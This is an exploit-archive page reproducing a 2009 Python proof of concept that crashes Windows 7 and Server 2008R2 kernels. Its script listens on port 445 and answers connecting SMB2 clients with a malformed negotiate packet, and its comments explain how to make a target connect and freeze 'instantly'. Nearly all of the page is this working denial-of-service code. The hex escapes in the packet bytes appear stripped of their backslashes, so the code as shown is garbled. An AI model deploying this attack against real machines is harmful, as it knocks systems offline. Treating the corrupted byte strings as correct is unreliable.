Windows 7 / Server 2008R2 Remote Kernel Crash

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windows 7 / Server 2008R2 Remote Kernel Crash
# Published : 2009-11-11
# Author : Laurent Gaffie
# Previous Title : XM Easy Personal FTP Server <= 5.8.0 DoS
# Next Title : IPsec-Tools Prior to 0.7.2 Multiple Remote Denial Of Service Vulnerabilities

#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an 
#infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \this_script_ip_addrBLAH , instantly crash
#Author: Laurent Gaffi???

import SocketServer

packet = ("x00x00x00x9a" # ---> length should be 9e not 9a..
"xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41"
"xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00"
"x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01"
"xcbx51xe0x19x62x60xcax01x80x00x1ex00x20x4cx4dx20"
"x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e"
"x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a")


class SMB2(SocketServer.BaseRequestHandler):

   def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()